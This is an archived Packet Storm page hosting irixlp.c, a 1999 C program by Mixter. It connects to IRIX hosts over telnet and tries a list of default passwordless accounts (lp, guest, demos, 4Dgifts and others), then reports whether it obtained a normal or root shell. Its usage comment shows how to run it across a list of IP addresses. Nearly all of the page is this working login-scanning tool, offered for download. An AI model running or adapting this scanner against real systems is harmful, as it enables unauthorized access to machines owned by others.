exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

irixlp.c

irixlp.c
Posted Sep 23, 1999
Authored by Mixter

Scans for the default logins on IRIX boxes. Courtesy of Mixter

systems | irix
SHA-256 | 24bb4b2576c66fa3a627292e52438a6d2321f903c3b4f9c6b6d8b7f9aeebb68e

irixlp.c

Change Mirror Download
/* IRIX Scanner - based on remotecmd.c by ADMcrew
irixlp.c is (c) 1999 by Mixter - http://mixter.org
This will scan a IRIX box for default passwordless logins.
Usage: ./irixlp <ip> [delay in microseconds]
To scan from a list: cat IPLIST | while read x ; do ./irixlp $x ; done
-- Mixter */

#define ACC1 "lp\n"
#define ACC2 "demos\n"
#define ACC3 "guest\n"
#define ACC4 "EZsetup\n"
#define ACC5 "4Dgifts\n"
#define ACC6 "OutOfBox\n"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>

void *memset (void *s, int c, size_t n);
void irixlp (int);
void usage (char *);
char *strcpy (char *dest, const char *src);
int ADMtelnet (u_long);
u_long host2ip (char *);

u_long TIMEMETHAT = 500000;

void
main (int argc, char **argv)
{
/* bla */
if (argc < 2)
usage (argv[0]);
if (argc > 2)
TIMEMETHAT = atoi (argv[2]);
printf ("%s: ", argv[1]);
fflush (stdout);
ADMtelnet (host2ip (argv[1]));
}

void
usage (char *c)
{
fprintf (stderr, "usage: %s <ip> [delay]\n", c);
exit (-1);
}

unsigned long
host2ip (char *serv)
{
struct sockaddr_in sinn;
struct hostent *hent;

hent = gethostbyname (serv);
if (hent == NULL)
return 0;
bzero ((char *) &sinn, sizeof (sinn));
memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);
return sinn.sin_addr.s_addr;
}

void
irixlp (int s)
{
char input[4096];
char ca[50];
int accno = 1;
bzero (input, sizeof (input));
while (read (s, input, 4000) > 0)
{

if (strstr (input, "ogin"))
{
switch (accno)
{
case 1:
write (s, ACC1, strlen (ACC1));
strcpy (ca, ACC1);
break;
case 2:
write (s, ACC2, strlen (ACC2));
strcpy (ca, ACC2);
break;
case 3:
write (s, ACC3, strlen (ACC3));
strcpy (ca, ACC3);
break;
case 4:
write (s, ACC4, strlen (ACC4));
strcpy (ca, ACC4);
break;
case 5:
write (s, ACC5, strlen (ACC5));
strcpy (ca, ACC5);
break;
case 6:
write (s, ACC6, strlen (ACC6));
strcpy (ca, ACC6);
break;
default:
close (s);
printf ("nope\n");
fflush (stdout);
exit (1);
break;
}
accno++;
usleep (TIMEMETHAT);
meextawr:
bzero (input, sizeof (input));
if (read (s, input, 4000) < 0)
{
printf ("connection reset\n");
fflush (stdout);
exit (1);
}
if (strlen (input) < 1)
{
printf ("connection reset\n");
fflush (stdout);
exit (1);
}
if (strstr (input, "$"))
{
printf ("%s (normal)\n", ca);
fflush (stdout);
exit (1);
}
if (strstr (input, "#"))
{
printf ("%s (ROOT)\n", ca);
fflush (stdout);
exit (1);
}
if (strstr (input, "assword"))
{
write (s, ca, strlen (ca));
write (s, "\n", strlen ("\n"));
goto meextawr;
}
if (strstr (input, "UX:"))
continue;
if (strstr (input, "error"))
continue;
if (strstr (input, "incorrect"))
continue;
if (strstr (input, "error"))
continue;
goto meextawr;
}
continue;
}
close (s);
}

int
ADMtelnet (u_long ip)
{
struct sockaddr_in sin;
u_char buf[4000];
int dasock, len;
int longueur = sizeof (struct sockaddr_in);

dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */

sin.sin_family = AF_INET;
sin.sin_port = htons (23);
sin.sin_addr.s_addr = ip;

if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1)
{
printf ("connection refused\n");
fflush (stdout);
return (-1);
}

while (1)
{
memset (buf, 0, sizeof (buf));

if ((len = read (dasock, buf, 1)) <= 0)
break;

if (*buf == (unsigned int) 255)
{
read (dasock, (buf + 1), 2);
if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2));
else if ((u_char) * (buf + 1) == (unsigned int) 253)
{
*(buf + 1) = 252;
write (dasock, buf, 3);
}
}
else
{
if (*buf != 0)
{
bzero (buf, sizeof (buf));
read (dasock, buf, sizeof (buf));
irixlp (dasock);
sleep (1);
return 0;
}

}
}
return 0;
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close